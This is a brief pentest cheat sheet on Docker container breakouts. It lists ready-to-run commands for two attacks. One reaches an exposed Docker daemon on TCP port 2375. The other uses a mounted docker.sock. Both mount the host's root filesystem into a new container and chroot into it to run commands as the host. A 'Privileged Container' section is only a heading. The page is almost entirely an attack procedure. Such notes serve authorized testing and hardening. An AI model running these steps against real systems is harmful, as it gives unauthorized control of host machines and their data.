Docker Breakouts
Misconfigured Docker Socket
//docker daemon is configured to listen on 2375 and 2376(encrypted) for API request
netstat -tlp
//verify if daemon is running below command shows docker info
curl localhost:2375/version | python3 -m json.tool
//Configure docker client to use the TCP Socket
export DOCKER_HOST="tcp://localhost:2375"
//now you can list docker images
docker images
//Mount root filesystem of host machine on /host directory of the container.
docker run -it -v /:/host/ ubuntu(respository):18.04(TAG) bash
//change to /host dir to list files
cd /host/
ls -l
//Use chroot on the /host directory.
chroot ./ bash
//now you broke out container and can execute commands on host
ps -eaf
find / -name searchquery 2>/dev/null
Mounted Docker Socket
//Search for docker socket.
find / -name docker.socket 2>/dev/null
//By default docker client is configured to use /var/run/docker.sock unix socket which is a symlink
to /run/docker.sock.
//now you can list docker images
docker images
//Mount root filesystem of host machine on /host directory of the container.
docker run -it -v /:/host/ ubuntu(respository):18.04(TAG) bash
//change to /host dir to list files
cd /host/
ls -l
//Use chroot on the /host directory.
chroot ./ bash
//now you broke out container and can execute commands on host
ps -eaf
find / -name searchquery 2>/dev/null
Privileged Container
References
Last updated